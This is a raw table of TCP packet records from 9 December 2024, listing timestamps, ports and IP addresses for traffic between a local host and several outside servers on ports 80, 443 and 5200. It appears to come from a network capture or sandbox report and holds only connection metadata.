Dec 9, 2024 08:08:57.496133089 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.496381998 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.496401072 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.496961117 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.496967077 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.497060061 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.501343966 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.501363993 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.501461029 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.501461029 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.501466036 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.501537085 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.506330967 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.506349087 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.506413937 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.506421089 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.506455898 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.508095026 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.511246920 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.511260033 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.512051105 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.512078047 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.512132883 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.512149096 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.512166977 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.513197899 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.513204098 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.513356924 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.539427996 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:57.596096039 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:57.596647978 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.596903086 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.597135067 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.598059893 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.598073959 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.598607063 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.599626064 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.599637985 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.599675894 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.600090981 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.601198912 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.601212025 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.602039099 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.602061033 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.602080107 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.602374077 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.602381945 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.602477074 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.602765083 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.602777958 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.602842093 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.602842093 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.603626013 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.604090929 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.604396105 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.605276108 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.605314970 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.605350018 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.605385065 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.605422020 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.605768919 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.606060982 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.606080055 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.606368065 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.606895924 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.606909037 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.606919050 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.606957912 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.606957912 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.607702017 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.607721090 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.607745886 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.608087063 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.608578920 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.608589888 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.609385967 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.609399080 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.609414101 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.610174894 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.610215902 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.610227108 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.610253096 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.610272884 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.610372066 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.611021042 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.611038923 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.611866951 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.611879110 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.611895084 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.612092972 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.612689018 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.612700939 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.612709999 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.612756968 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.612756968 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.630673885 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.630892038 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.630918980 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.631200075 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.631376982 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.631401062 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.631844044 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.632098913 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.632100105 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.632705927 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.639174938 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.639187098 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.639225006 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.639230013 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.707308054 CET	49924	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.707350969 CET	443	49924	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.707653999 CET	49924	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.708456039 CET	49924	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.708470106 CET	443	49924	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.714589119 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.714773893 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.714807987 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.715138912 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.715481043 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.715516090 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.715605974 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.716000080 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.716026068 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.716379881 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.716408014 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.716798067 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.716824055 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.716845989 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.717144012 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.717207909 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.717529058 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.717912912 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.717976093 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.718229055 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.718257904 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.718791008 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.718991041 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.719017982 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.719537020 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.719835043 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.719862938 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.720400095 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.720429897 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.720580101 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.720787048 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.721158981 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.721405029 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.721445084 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.721782923 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.722038984 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.722299099 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.722323895 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.722827911 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.723043919 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.723077059 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.723634005 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.723841906 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.723870993 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.723964930 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.724513054 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.724575043 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.724725008 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.724826097 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.725270033 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.725481987 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.725542068 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.726089954 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.726294041 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.726322889 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.726891041 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.728091002 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.756040096 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.756141901 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.756196022 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.756263971 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.756539106 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.756716967 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.756764889 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.757055998 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.757411003 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.757437944 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.757797003 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.758475065 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.839610100 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.839813948 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.839819908 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.839936018 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.840105057 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.840245008 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.840600967 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.840701103 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.840732098 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.841083050 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.841111898 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.841451883 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.841840982 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.841870070 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.842197895 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.842552900 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.842581987 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.842772007 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.842797995 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.842859030 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.843178034 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.843231916 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.843616962 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.843698978 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.843864918 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.843980074 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.844427109 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.844505072 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.844634056 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.845010042 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.845206022 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.845432043 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.845458031 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.846064091 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.846291065 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.846318007 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.846873999 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.847081900 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.847110033 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.847472906 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.847671986 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.847837925 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.847868919 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.847934008 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.848483086 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.848701000 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.848709106 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.848810911 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.849309921 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.849515915 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.849538088 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.850203037 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.850586891 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.850615025 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.850945950 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.851304054 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.881059885 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.881203890 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.881268024 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.881320953 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.882838964 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.882848978 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.883641958 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.883654118 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.883663893 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.883671045 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.883688927 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.884088993 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.884457111 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.884469986 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.884583950 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.885471106 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.885689974 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.970081091 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.970302105 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.970329046 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.970701933 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.970824957 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.970875978 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.986675978 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.986865044 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.986881018 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.986920118 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.987231970 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.987329960 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.987384081 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.987672091 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.987767935 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.988046885 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.988223076 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.988250017 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.988532066 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.988910913 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.988940001 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.989279032 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.989689112 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.989717960 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.990031004 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.990566969 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.990591049 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.990725040 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.990807056 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.990849972 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.991322041 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.991370916 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.991503954 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.991588116 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.992137909 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.992194891 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.992337942 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.992392063 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.992908955 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.993200064 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.993802071 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.993828058 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.993993044 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.994554043 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.994581938 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.994745970 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.994849920 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.995433092 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.995532990 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.995577097 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.995758057 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.996212006 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.996428967 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.996455908 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.997031927 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.997251034 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.997288942 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.997780085 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.998717070 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.048008919 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.048098087 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.048155069 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.048506975 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.048819065 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.048865080 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.048966885 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.049089909 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.049145937 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.049458981 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.049529076 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.049843073 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.050167084 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.050242901 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.050582886 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.050610065 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.052851915 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.056989908 CET	5200	49917	185.157.162.216	192.168.2.4
Dec 9, 2024 08:08:58.058551073 CET	49925	5200	192.168.2.4	185.157.162.216
Dec 9, 2024 08:08:58.063555956 CET	5200	49888	185.157.162.216	192.168.2.4
Dec 9, 2024 08:08:58.095637083 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.095652103 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.095849991 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.095869064 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.096092939 CET	49880	80	192.168.2.4	185.215.113.206
